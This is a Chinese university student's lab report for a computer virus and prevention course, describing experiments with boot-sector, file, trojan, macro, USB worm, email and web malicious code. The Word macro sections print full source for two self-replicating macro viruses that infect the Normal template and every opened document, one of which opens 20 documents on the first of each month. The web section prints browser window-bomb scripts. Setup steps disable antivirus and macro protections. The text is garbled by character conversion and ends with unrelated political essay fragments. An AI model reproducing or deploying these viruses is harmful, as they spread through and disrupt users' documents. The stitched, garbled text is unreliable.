南京航空航天大學(xué) 計(jì)算機(jī)病毒及防治 上機(jī)實(shí)驗(yàn)報(bào)告 學(xué)院: 理學(xué)院 專業(yè): 信息與計(jì)算科學(xué) 學(xué)號(hào): 081310128 姓名: 王晨雨 授課老師: 薛明富 二〇一六年十二月
目錄 實(shí)驗(yàn)一:引導(dǎo)型病毒實(shí)驗(yàn)............................................... 1 實(shí)驗(yàn)二:病毒實(shí)驗(yàn)..................................................... 6 實(shí)驗(yàn)三:PE 文件格式實(shí)驗(yàn) .............................................. 9 實(shí)驗(yàn)四:32 位文件型病毒實(shí)驗(yàn) ......................................... 10 實(shí)驗(yàn)五:簡(jiǎn)單得木馬實(shí)驗(yàn).............................................. 13 實(shí)驗(yàn)七:木馬病毒清除實(shí)驗(yàn)(選做)...................................... 17 實(shí)驗(yàn)八:Word 宏病毒實(shí)驗(yàn)(一) ......................................... 20 實(shí)驗(yàn)九:Word 宏病毒實(shí)驗(yàn)(二) ......................................... 25 實(shí)驗(yàn)十:Linux 腳本病毒實(shí)驗(yàn)(選做) .................................... 29 實(shí)驗(yàn)十二:基于 U 盤傳播得蠕蟲病毒實(shí)驗(yàn)................................ 29 實(shí)驗(yàn)十三:郵件型病毒實(shí)驗(yàn)............................................ 32 實(shí)驗(yàn)十四:Web 惡意代碼實(shí)驗(yàn) .......................................... 35
實(shí)驗(yàn)一: 引導(dǎo)型病毒實(shí)驗(yàn) 【實(shí)驗(yàn)?zāi)康谩?/p>
通過實(shí)驗(yàn),了解引導(dǎo)區(qū)病毒得感染對(duì)象與感染特征,重點(diǎn)學(xué)習(xí)引導(dǎo)病毒得感染機(jī)制與恢復(fù)感染病毒文件得方法,提高匯編語(yǔ)言得使用能力。
實(shí)驗(yàn)內(nèi)容 引導(dǎo)階段病毒由軟盤感染硬盤實(shí)驗(yàn)。通過觸發(fā)病毒,觀察病毒發(fā)作得現(xiàn)象與步驟,學(xué)習(xí)病毒得感染機(jī)制:閱讀與分析病毒得代碼。
DOS 運(yùn)行時(shí)病毒由硬盤感染軟盤得實(shí)現(xiàn)。通過觸發(fā)病毒,觀察病毒發(fā)作得現(xiàn)象與步驟,學(xué)習(xí)病毒得感染機(jī)制:閱讀與分析病毒得代碼。
【實(shí)驗(yàn)平臺(tái)】
】
VMWare Workstation 12 PRO MSDOS 7、10
【試驗(yàn)內(nèi)容】
】
第一步:環(huán)境安裝 安裝虛擬機(jī) VMWare,在虛擬機(jī)環(huán)境內(nèi)安裝 MSDOS 7、10 環(huán)境。
第二步:軟盤感染硬盤 1) 運(yùn)行虛擬機(jī),檢查目前虛擬硬盤就是否含有病毒,圖 1 表示沒有病毒正常啟動(dòng)硬盤得狀態(tài)。
2) 在附書資源中復(fù)制含有病毒得虛擬軟盤 virus、img 3) 將含有病毒得軟盤插入虛擬機(jī)引導(dǎo),可以瞧到閃動(dòng)得字符*^_^*,如圖 2 所示,按任意鍵進(jìn)入圖 3。
第三步:驗(yàn)證硬盤已經(jīng)被感染 1) 取出虛擬軟盤,通過硬盤引導(dǎo),再次出現(xiàn)了病毒得畫面如圖 4。
2) 按任意鍵后正常引導(dǎo)了 DOS 系統(tǒng)如圖 5。可見,硬盤已被感染。
第四步:硬盤感染軟盤 1) 下載 empty、img,并且將它插入虛擬機(jī),啟動(dòng)計(jì)算機(jī),由于該盤為空,如圖 6、 2) 取出虛擬軟盤,從硬盤啟動(dòng),通過命令format A:/q快速格式化軟盤。可能提示出錯(cuò),這時(shí)只要按 R 鍵即可。如圖 7、 3) 成功格式化后得結(jié)果如圖 8。
4) 不要取出虛擬軟盤,重新啟動(dòng)虛擬機(jī),這時(shí)就是從 empty、img 引導(dǎo),可以瞧到病毒得畫面,如圖 9。按任意鍵進(jìn)入圖 10、可見,病毒已經(jīng)成功由硬盤傳染給了軟盤。
實(shí)驗(yàn)截圖: :
1. 軟盤啟動(dòng)后:
2. 硬盤啟動(dòng)后:
實(shí)驗(yàn)二 二: 病毒實(shí)驗(yàn) 【實(shí)驗(yàn)?zāi)康谩?/p>
1、掌握病毒得傳播原理。
2、掌握 MASM611 編譯工具得使用。
【實(shí)驗(yàn)平臺(tái)】
】
1、MSDOS 7、10 2、MASM611 【試驗(yàn)內(nèi)容】
】
1、 安裝 MSDOS 7、10 環(huán)境。虛擬機(jī)安裝該環(huán)境亦可,步驟在此不再贅述。
2、 在 MSDOS C:\MASM 目錄下安裝 MASM611,然后將 binr 目錄下得 link、exe 復(fù)制到 bin 目錄下。
3、 在目錄下復(fù)制病毒程序 Virus、asm 及測(cè)試程序源代碼 BeInfected、asm 4、 編譯鏈接 BeInfected、asm,形成 BeInfected 測(cè)試程序 5、 編譯鏈接 virus、asm,生成病毒程序 virus、exe。
6、 在 C:\MASM\Bin 目錄下建立 del、txt 文件,并且將“test、”與病毒代碼 2“virus、asm”復(fù)制到此目錄下。
7、 執(zhí)行“test、”觀察結(jié)果。
8、 編譯并連接 “virus、asm” 生成“virus、exe”,執(zhí)行此 exe 文件以感染“test、”文件并且自動(dòng)刪除 del、txt,而后執(zhí)行“test、”可以發(fā)現(xiàn)感染后得結(jié)果。
實(shí)驗(yàn)截圖: :
1. 編譯存儲(chǔ)好文件:
2. Dos 下查瞧文件夾內(nèi)容: 3. 查瞧 TEST 得內(nèi)容:
4. 運(yùn)行病毒程序: 5. 查瞧感染病毒后文件夾內(nèi)容: 6. 查瞧感染病毒后 TEST 得內(nèi)容:
實(shí)驗(yàn)三 三:PE 文件格式實(shí)驗(yàn) 【 實(shí)驗(yàn)?zāi)康?】
了解 PE 文件基本結(jié)構(gòu) 【 實(shí)驗(yàn)環(huán)境 】
運(yùn)行環(huán)境:Windows 2000、Windows 9x、Windows NT 以及 Windows XP 編譯環(huán)境: Visual Studio 6、0 【 實(shí)驗(yàn)步驟 】
使用編譯環(huán)境打開源代碼工程,編譯后可以生成 winpe、exe。
預(yù)備步驟:找任意一個(gè) Win32 下得 Exe 文件作為查瞧對(duì)象。
實(shí)驗(yàn)內(nèi)容:運(yùn)行 winpe、exe,并打開任一 exe 文件,選擇不同得菜單,可以查瞧到 exe 文件得內(nèi)部結(jié)構(gòu)。
實(shí)驗(yàn)截圖: :
感染前
感染后
第一處:
第二處:
第三處:
第四處:
第五處: 感染前:
感染后:
實(shí)驗(yàn)四 四:32 位文件型病毒實(shí)驗(yàn) 【 實(shí)驗(yàn)?zāi)康谩?/p>
】
? 了解文件型病毒得基本制造過程 ? 了解病毒得感染、破壞機(jī)制,進(jìn)一步認(rèn)識(shí)病毒程序 ? 掌握文件型病毒得特征與內(nèi)在機(jī)制 【 實(shí)驗(yàn)環(huán)境】
】
運(yùn)行環(huán)境 Windows 2000、Windows 9x、Windows NT 與 Windows XP 【 實(shí)驗(yàn)步驟】
】
目錄中得 virus、rar 包中包括 Virus、exe(編譯得病毒程序)、軟件使用說明書、doc(請(qǐng)仔細(xì)閱讀)、源代碼詳解、doc(對(duì)代碼部分加入了部分注釋)以及 pll、asm(程序源代碼)。Example、rar 包中選取得就是一個(gè)常用程序(ebookedit)安裝后得安裝目錄下得程序,用于測(cè)試病毒程序。
預(yù)備步驟:將 example、rar 解壓到某個(gè)目錄。解壓完畢后,應(yīng)該在該目錄下有 Buttons目錄、ebookcode、exe、ebookedit、exe、ebrandit、exe 以及 keymaker、exe 等程序,然后把 virus、rar 包解壓后得 Virus、exe 復(fù)制到該目錄中。
實(shí)驗(yàn)內(nèi)容:通過運(yùn)行病毒程序觀瞧各步得提示以了解病毒得內(nèi)在機(jī)制。
實(shí)驗(yàn)截圖: :
1、感染前準(zhǔn)備:
2、感染過程:
3、感染后:
4、感染文件比對(duì)
實(shí)驗(yàn)五 五: 簡(jiǎn)單得木馬實(shí)驗(yàn) 【 實(shí)驗(yàn)?zāi)康谩?/p>
】
掌握木馬得基本原理 【 實(shí)驗(yàn)環(huán)境】
】
? Windows XP 操作系統(tǒng) ? Visual Studio 6、0 編程環(huán)境 【 實(shí)驗(yàn)步驟】
】
(1)
復(fù)制實(shí)驗(yàn)文件到實(shí)驗(yàn)得計(jì)算機(jī)上。其中,SocketListener 目錄下就是木馬 Server 端源代碼,Socketmand 目錄下就是木馬 Client 端源代碼。
(2)
用 Visual Studio 6、0 環(huán)境分別編譯這兩部分代碼。
(3)
運(yùn)行 SocketListener 應(yīng)用程序,也就就是啟動(dòng)了木馬被控端。
(4)
運(yùn)行 Socketmand 應(yīng)用程序,也就就是啟動(dòng)了木馬得控制端,可以在控制端執(zhí)行命令來控制被控制端。實(shí)驗(yàn)支持得命令參考表: 命令
命令含義
CMD 執(zhí)行應(yīng)用程序 !SHUT 退出木馬
獲得遠(yuǎn)程文件 EDITCONF 編輯配置文件 LIST 列目錄 VIEW 查瞧文件內(nèi)容 CDOPEN 關(guān) CD CDCLOSE 開 CD REBOOT 重啟遠(yuǎn)端計(jì)算機(jī)
實(shí)驗(yàn)截圖: :
1、建立連接:
2、發(fā)送指令及成功后結(jié)果: (1)
運(yùn)行程序:
(2)
關(guān)閉木馬: (3)
獲得文件:
(4)
編輯配置文件: (5)
查瞧文件:
(6)
查瞧文件內(nèi)容: (7)
重啟計(jì)算機(jī):
實(shí)驗(yàn)七 七: 木馬病毒清除實(shí)驗(yàn)( 選做) 【 實(shí)驗(yàn)?zāi)康谩?/p>
】
掌握木馬病毒清除得基本原理 【 實(shí)驗(yàn)平臺(tái)】
】
? Windows 32 位操作系統(tǒng) ? Visual Studio 7、0 編譯環(huán)境 【 實(shí)驗(yàn)步驟】
】
文件 Antitrojan、sln 為工程文件。使用 Visual Studio 編譯該工程,生成 Antitrojan、exe 可執(zhí)行程序。執(zhí)行 Antitrojan、exe 觀察執(zhí)行效果。
實(shí)驗(yàn)截圖: :
1. 確認(rèn)木馬存在: 2. 進(jìn)行編譯: (1)
修改試驗(yàn)機(jī)名字:
(2)
添加查殺代號(hào): (3)
添加查殺代碼:
3. 清除成功:
實(shí)驗(yàn)八 八:Word 宏病毒實(shí)驗(yàn)( 一) 實(shí)驗(yàn)?zāi)康?/p>
Word 宏就是指能組織到一起為獨(dú)立命令使用得一系列 Word 指令,它能使日常工作變得容易。本實(shí)驗(yàn)演示了宏得編寫,通過兩個(gè)簡(jiǎn)單得宏病毒示例,說明宏得原理及其安全漏洞與缺陷,理解宏病毒得作用機(jī)制,從而加強(qiáng)對(duì)宏病毒得認(rèn)識(shí),提高防范意識(shí)。
實(shí)驗(yàn)所需條件與環(huán)境 硬件設(shè)備:局域網(wǎng),終端 PC 機(jī)。
系統(tǒng)軟件:Windows 系列操作系統(tǒng) 支撐軟件:Word 2003 軟件設(shè)置:關(guān)閉殺毒軟;打開 Word 2003,在工具?宏?安全性中,將安全級(jí)別設(shè)置為低,在可靠發(fā)行商選項(xiàng)卡中,選擇信任任何所有安裝得加載項(xiàng)與模板,選擇信任 visual basic 項(xiàng)目得訪問 實(shí)驗(yàn)環(huán)境配置如下圖所示: 受感染終端受感染W(wǎng)ord文檔被感染終端 宏病毒傳播示意圖 實(shí)驗(yàn)內(nèi)容與分析
為了保證該實(shí)驗(yàn)不至于造成較大得破壞性,進(jìn)行實(shí)驗(yàn)感染后,被感染終端不要打開過多得 word 文檔,否則清除比較麻煩(對(duì)每個(gè)打開過得文檔都要清除)。
例 例 1 自我復(fù)制, 感染 word 公用模板與當(dāng)前文檔 代碼如下: "MicroVirus Sub Document_Open
On Error Resume Next Application、DisplayStatusBar = False Options、SaveNormalPrompt = False Ourcode = ThisDocument、VBProject、VBponents(1)、CodeModule、Lines(1, 100) Set Host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument、VBProject、VBponents(1)、CodeModule End If With Host
If 、Lines(1、1) <> ""MicroVirus" Then
、DeleteLines 1, 、CountOfLines
、InsertLines 1, Ourcode
、ReplaceLine 2, "Sub Document_Close"
If ThisDocument = nomaltemplate Then
、ReplaceLine 2, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If
End If End With MsgBox "MicroVirus by Content Security Lab" End Sub 打開一個(gè) word 文檔,然后按 Alt+F11 調(diào)用宏編寫窗口(工具?宏?Visual Basic?宏編輯器),在左側(cè)得 project—>Microsoft Word 對(duì)象?ThisDocument 中輸入以上代碼,保存,此時(shí)當(dāng)前 word 文檔就含有宏病毒,只要下次打開這個(gè) word 文檔,就會(huì)執(zhí)行以上代碼,并將自身復(fù)制到 Normal、dot(word 文檔得公共模板)與當(dāng)前文檔得 ThisDocument 中,同時(shí)改變函數(shù)名(模板中為 Document_Close,當(dāng)前文檔為 Document_Open),此時(shí)所有得 word 文檔打開與關(guān)閉時(shí),都將運(yùn)行以上得病毒代碼,可以加入適當(dāng)?shù)脨阂獯a,影響 word 得正常使用,本例中只就是簡(jiǎn)單得跳出一個(gè)提示框。
代碼解釋
以上代碼得基本執(zhí)行流程如下: 1) 進(jìn)行必要得自我保護(hù) Application、DisplayStatusBar = False Options、SaveNormalPrompt = False 高明得病毒編寫者其自我保護(hù)將做得非常好,可以使 word 得一些工具欄失效,例如將工具菜單中得宏選項(xiàng)屏蔽,也可以修改注冊(cè)表達(dá)到很好得隱藏效果。
本例中只就是屏蔽狀態(tài)欄,以免顯示宏得運(yùn)行狀態(tài),并且修改公用模板時(shí)自動(dòng)保存,不給用戶提示。
2) 得到當(dāng)前文檔得代碼對(duì)象與公用模板得代碼對(duì)象 Ourcode = ThisDocument、VBProject、VBponents(1)、CodeModule、Lines(1, 100) Set Host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set Host = ActiveDocument、VBProject、VBponents(1)、CodeModule
End If 3) 檢查模板就是否已經(jīng)感染病毒,如果沒有,則復(fù)制宏病毒代碼到模板,并且修改函數(shù)名。
With Host
If 、Lines(1、1) <> ""MicroVirus" Then
、DeleteLines 1, 、CountOfLines
、InsertLines 1, Ourcode
、ReplaceLine 2, "Sub Document_Close"
If ThisDocument = nomaltemplate Then
、ReplaceLine 2, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If
End If End With 4) 執(zhí)行惡意代碼 MsgBox "MicroVirus by Content Security Lab" 實(shí)驗(yàn)截圖
: :
1、復(fù)制代碼
2、感染病毒后現(xiàn)象
3、感染其她文檔
實(shí)驗(yàn)九 九:Word 宏病毒實(shí)驗(yàn)( 二) 例 例 2 具有一定破壞性得宏 我們可以對(duì)上例中得惡意代碼稍加修改,使其具有一定得破壞性(這里以著名宏病毒“臺(tái)灣一號(hào)”得惡意代碼部分為基礎(chǔ),為使其在 word2003 版本中運(yùn)行,且降低破壞性,對(duì)源代碼作適當(dāng)修改)。
完整代碼如下: "moonlight Dim nm(4) Sub Document_Open "DisableInput 1 Set ourcodemodule = ThisDocument、VBProject、VBponents(1)、CodeModule Set host = NormalTemplate、VBProject、VBponents(1)、CodeModule If ThisDocument = NormalTemplate Then
Set host = ActiveDocument、VBProject、VBponents(1)、CodeModule End If With host If 、Lines(1, 1) <> ""moonlight" Then
、DeleteLines 1, 、CountOfLines 、InsertLines 1, ourcodemodule、Lines(1, 100) 、ReplaceLine 3, "Sub Document_Close"
If ThisDocument = NormalTemplate Then
、ReplaceLine 3, "Sub Document_Open"
ActiveDocument、SaveAs ActiveDocument、FullName
End If End If End With Count = 0 If Day(Now) = 1 Then try:
On Error GoTo try
test = 1
con = 1
tog$ = ""
i = 0
While test = 1
For i = 0 To 4
nm(i) = Int(Rnd * 10)
con = con * nm(i)
If i = 4 Then
tog$ = tog$ + Str$(nm(4)) + "=?"
GoTo beg
End If
tog$ = tog$ + Str$(nm(i)) + "*"
Next i beg:
Beep
ans$ = InputBox$("今天就是" + Date$ + ",跟您玩一個(gè)心算游戲" + Chr$(13) + "若您答錯(cuò),只好接受震撼教育、、、、、、" + Chr$(13) + tog$, "臺(tái)灣 NO、1 Macro Virus")
If RTrim$(LTrim$(ans$)) = LTrim$(Str$(con)) Then
Documents、Add
Selection、Paragraphs、Alignment = wdAlignParagraphCenter
Beep
With Selection、Font
、Name = "細(xì)明體"
、Size = 16
、Bold = 1
、Underline = 1
End With
Selection、InsertAfter Text:="何謂宏病毒"
Selection、InsertParagraphAfter
Beep
Selection、InsertAfter Text:="答案:"
Selection、Font、Italic = 1
Selection、InsertAfter Text:="我就就是、、、、、、"
Selection、InsertParagraphAfter
Selection、InsertParagraphAfter
Selection、Font、Italic = 0
Beep
Selection、InsertAfter Text:="如何預(yù)防宏病毒"
Selection、InsertParagraphAfter
Beep
Selection、InsertAfter Text:="答案:"
Selection、Font、Italic = 1
Selection、InsertAfter Text:="不要瞧我、、、、、、"
GoTo out
Else
Count = Count + 1
For j = 1 To 20
Beep
Documents、Add
Next j
Selection、Paragraphs、Alignment = wdAlignParagraphCenter
Selection、InsertAfter Text:="宏病毒"
If Count = 2 Then GoTo out
GoTo try
End If Wend End If out: End Sub
該病毒得效果如下:當(dāng)打開被感染得 word 文檔時(shí),首先進(jìn)行自我復(fù)制,感染 word 模板,然后檢查日期,瞧就是否就是 1 日(即在每月得 1 日會(huì)發(fā)作),然后跳出一個(gè)對(duì)話框,要求用戶進(jìn)行一次心算游戲,這里只用四個(gè)小于 10 得數(shù)相乘,如果作者得計(jì)算正確,那么就會(huì)新建一個(gè)文檔,跳出如下字幕: 何謂宏病毒
答案: : 我就就是 、、、、、、
如何預(yù)防宏病毒
答案: : 不要瞧我 、、、、、、
如果計(jì)算錯(cuò)誤,新建 20 個(gè)寫有“宏病毒”字樣得 word 文檔,然后再一次進(jìn)行心算游戲,總共進(jìn)行 3 次,然后跳出程序。關(guān)閉文檔得時(shí)候也會(huì)執(zhí)行同樣得詢問。
清除宏病毒
對(duì)每一個(gè)受感染得 word 文檔進(jìn)行如下操作。
打開受感染得 word 文檔,進(jìn)入宏編輯環(huán)境(Alt+F11),打開 Normal?Microsoft Word 對(duì)象?This Document,清除其中得病毒代碼(只要?jiǎng)h除所有內(nèi)容即可)。
然后打開 Project?Microsoft Word?This Document,清除其中得病毒代碼。
實(shí)際上,模板得病毒代碼只要在處理最后一個(gè)受感染文件時(shí)清除即可,然而清除模板病毒后,如果重新打開其她已感染文件,模板將再次被感染,因此為了保證病毒被清除,可以查瞧每一個(gè)受感染文檔得模板,如果存在病毒代碼,都進(jìn)行一次清除。
實(shí)驗(yàn)截圖: :
1. 復(fù)制代碼: 2. 感染現(xiàn)象:
實(shí)驗(yàn)十 十:Linux 腳本病毒實(shí)驗(yàn)( 選做) 實(shí)驗(yàn) 十二: 基于 U 盤傳播得蠕蟲病毒實(shí)驗(yàn) 【 實(shí)驗(yàn)?zāi)康谩?/p>
】
理解 U 盤蠕蟲病毒得傳染原理。
【 實(shí)驗(yàn)環(huán)境】
】
? VMWare Workstation 5、5、3 ? Windows XP SP2 【 實(shí)驗(yàn)步驟】
】
(1)
實(shí)驗(yàn)素材:在附書資源目錄 Experiment\wormu 下 (2)
檢查干凈得電腦各分區(qū)就是否存在 autorun、inf 與病毒文件 virus、exe (3)
插入含有病毒得 U 盤,U 盤得右鍵菜單出現(xiàn) auto 后,雙擊 U 盤,觀察現(xiàn)在各個(gè)分區(qū)得情況 (4)
查瞧 autorun、inf 文件內(nèi)容。
(5)
觀察病毒觸發(fā)后得效果。
(6)
插入干凈得 U 盤,觀察 U 盤就是否被感染。
【 實(shí)驗(yàn)注意事項(xiàng)】
】
(1)
實(shí)驗(yàn)前,請(qǐng)關(guān)閉殺毒軟件。否則病毒樣本會(huì)被自動(dòng)殺除。
(2)
請(qǐng)注意操作系統(tǒng)得版本。Windows XP SP2 及以下版本都適用。
實(shí)驗(yàn)截圖: :
1、編譯后生成:
2、運(yùn)行效果:
實(shí)驗(yàn) 十三: 郵件型病毒實(shí)驗(yàn) 【 實(shí)驗(yàn)?zāi)康谩?/p>
】
掌握郵件型病毒基本原理 【 實(shí)驗(yàn)環(huán)境】
】
? Windows XP 操作系統(tǒng) ? Outlook 郵件客戶端 【 實(shí)驗(yàn)步驟】
】
(7)
在 Outlook 中設(shè)置用戶賬號(hào) (8)
在 Outlook 地址簿中添加聯(lián)系人 (9)
在實(shí)驗(yàn)得計(jì)算機(jī)上得 C 根目錄下創(chuàng)建空文件 test、vbs (10)
關(guān)閉反病毒軟件得實(shí)時(shí)防護(hù)功能 (11)
把實(shí)驗(yàn)代碼錄入到 test、vbs 文件里。
(12)
運(yùn)行腳本文件,程序啟動(dòng) Outlook(由于現(xiàn)在得 Outlook 版本較高,Outlook 會(huì)提示就是否允許操作,請(qǐng)選擇允許)發(fā)送郵件 【 實(shí)驗(yàn)注意事項(xiàng)】
】
(3)
要成功實(shí)驗(yàn),系統(tǒng)必須安裝 Outlook Application 應(yīng)用軟件 (4)
為了不給您得地址簿聯(lián)系人發(fā)送垃圾郵件,可以先將地址簿中得聯(lián)系人導(dǎo)出,然后輸入實(shí)驗(yàn)用郵件地址。實(shí)驗(yàn)結(jié)束后,再重新導(dǎo)入原理地址簿中得聯(lián)系人。
(5)
程序運(yùn)行后,打開實(shí)驗(yàn)郵箱查瞧實(shí)驗(yàn)結(jié)果。一般而言,由于現(xiàn)在得郵件服務(wù)器都會(huì)對(duì)郵件進(jìn)行掃描,所以傳送了病毒得郵件不能傳送到郵箱。解決辦法就是:將程序中得一個(gè)語(yǔ)句 ObjMail、Attachments、Add(“C:\test、vbs”)刪除,或者將附件 test、vbs 文件內(nèi)容改為其她內(nèi)容。
實(shí)驗(yàn)截圖: :
1. 將文件存放在 C 盤,并且修改好文件: 2. 運(yùn)行文件,發(fā)送郵件: 3. 發(fā)送以及收到郵件:
實(shí)驗(yàn) 十四:Web 惡意代碼實(shí)驗(yàn) 實(shí)驗(yàn)一: 【實(shí)驗(yàn)?zāi)康谩?/p>
掌握網(wǎng)頁(yè)惡意代碼基本原理。
【實(shí)驗(yàn)平臺(tái)】
Windows XP 操作系統(tǒng) IE(Internet Explorer)瀏覽器
【實(shí)驗(yàn)步驟】
從光盤上拷貝實(shí)驗(yàn)文件到實(shí)驗(yàn)機(jī)器上(源碼位置:光盤盤符:\Experiment\IEMalware\1、html)。
用 IE 打開該文件,IE 不斷得打開 163 網(wǎng)頁(yè)。
如果 IE 阻止了顯示內(nèi)容,右鍵點(diǎn)擊出現(xiàn)得提示信息,選擇“允許阻止得內(nèi)容”,就可以瞧到實(shí)驗(yàn)現(xiàn)象。
【程序源碼】
<html> <body onload = "WindowBomb"> <SCRIPT LANGUAGE = "javascript"> function WindowBomb { while (true){ window、open("") } } </script> </body> </html> 實(shí)驗(yàn)二: 【實(shí)驗(yàn)?zāi)康谩?/p>
掌握網(wǎng)頁(yè)惡意代碼基本原理。
【實(shí)驗(yàn)平臺(tái)】
Windows XP 操作系統(tǒng) IE(Internet Explorer)瀏覽器
【實(shí)驗(yàn)步驟】
從光盤上拷貝實(shí)驗(yàn)文件到實(shí)驗(yàn)機(jī)器上(源碼位置:光盤盤符:\Experiment\IEMalware\2、html)。
IE 顯示得地方出現(xiàn)黑白顏色不斷得閃動(dòng)。
如果 IE 阻止了顯示內(nèi)容,右鍵點(diǎn)擊出現(xiàn)得提示信息,選擇“允許阻止得內(nèi)容”,就可以瞧到實(shí)驗(yàn)現(xiàn)象。
【程序源碼】
<html> <body> <script> var color = new Array color[0]="black" color[1]="white" x = 0 ; while(true){
document、bgColor=color[x++];
document、bgColor=color[x]; } </script> </body> </html> 實(shí)驗(yàn)截圖: :
實(shí)驗(yàn)一: 實(shí)驗(yàn)二:
推薦訪問: 計(jì)算機(jī)病毒 防治 實(shí)驗(yàn)在偉大祖國(guó)73華誕之際,我參加了單位組織的“光影鑄魂”主題黨日活動(dòng),集中觀看了抗美援朝題材影片《長(zhǎng)津湖》,再一次重溫這段悲壯歷史,再一次深刻感悟偉大抗美援朝精神。1950年10月,新中國(guó)剛剛成立一年,
根據(jù)省局黨組《關(guān)于舉辦習(xí)近平談治國(guó)理政(第四卷)讀書班的通知》要求,我中心通過專題學(xué)習(xí)、專題研討以及交流分享等形式,系統(tǒng)的對(duì)《習(xí)近平談治國(guó)理政》(第四卷)進(jìn)行了深入的學(xué)習(xí)與交流,下面我就來談一談我個(gè)人
《習(xí)近平談治國(guó)理政》(第四卷)是在百年變局和世紀(jì)疫情相互疊加的大背景下,對(duì)以習(xí)近平同志為核心的黨中央治國(guó)理政重大戰(zhàn)略部署、重大理論創(chuàng)造、重大思想引領(lǐng)的系統(tǒng)呈現(xiàn)。它生動(dòng)記錄了新一代黨中央領(lǐng)導(dǎo)集體統(tǒng)籌兩個(gè)
《真抓實(shí)干做好新發(fā)展階段“三農(nóng)工作”》是《習(xí)近平談治國(guó)理政》第四卷中的文章,這是習(xí)近平總書記在2020年12月28日中央農(nóng)村工作會(huì)議上的集體學(xué)習(xí)時(shí)的講話。文章指出,我常講,領(lǐng)導(dǎo)干部要胸懷黨和國(guó)家工作大
在《習(xí)近平談治國(guó)理政》第四卷中,習(xí)近平總書記強(qiáng)調(diào),江山就是人民,人民就是江山,打江山、守江山,守的是人民的心。從嘉興南湖中駛出的小小紅船,到世界上最大的執(zhí)政黨,在中國(guó)共產(chǎn)黨的字典里,“人民”一詞從來都
黨的十八大以來,習(xí)近平總書記以馬克思主義戰(zhàn)略家的博大胸襟和深謀遠(yuǎn)慮,在治國(guó)理政和推動(dòng)全球治理中牢固樹立戰(zhàn)略意識(shí),在不同場(chǎng)合多次圍繞戰(zhàn)略策略的重要性,戰(zhàn)略和策略的關(guān)系,提高戰(zhàn)略思維、堅(jiān)定戰(zhàn)略自信、強(qiáng)化戰(zhàn)
《習(xí)近平談治國(guó)理政》第四卷集中展示了以習(xí)近平同志為核心的黨中央在百年變局和世紀(jì)疫情相互疊加背景下,如何更好地堅(jiān)持和發(fā)展中國(guó)特色社會(huì)主義而進(jìn)行的生動(dòng)實(shí)踐與理論探索;對(duì)于新時(shí)代堅(jiān)持和發(fā)展什么樣的中國(guó)特色社
在黨組織的關(guān)懷下,我有幸參加了區(qū)委組織部組織的入黨積極分子培訓(xùn)班。為期一周的學(xué)習(xí),學(xué)習(xí)形式多樣,課程內(nèi)容豐富,各位專家的講解細(xì)致精彩,對(duì)于我加深對(duì)黨的創(chuàng)新理論的認(rèn)識(shí)、對(duì)黨的歷史的深入了解、對(duì)中共黨員的
《習(xí)近平談治國(guó)理政》第四卷《共建網(wǎng)上美好精神家園》一文中指出:網(wǎng)絡(luò)玩命是新形勢(shì)下社會(huì)文明的重要內(nèi)容,是建設(shè)網(wǎng)絡(luò)強(qiáng)國(guó)的重要領(lǐng)域。截至2021年12月,我國(guó)網(wǎng)民規(guī)模達(dá)10 32億,較2020年12月增長(zhǎng)4
剛剛召開的中國(guó)共產(chǎn)黨第十九屆中央委員會(huì)第七次全體會(huì)議上討論并通過了黨的十九屆中央委員會(huì)向中國(guó)共產(chǎn)黨第二十次全國(guó)代表大會(huì)的報(bào)告、黨的十九屆中央紀(jì)律檢查委員會(huì)向中國(guó)共產(chǎn)黨第二十次全國(guó)代表大會(huì)的工作報(bào)告和《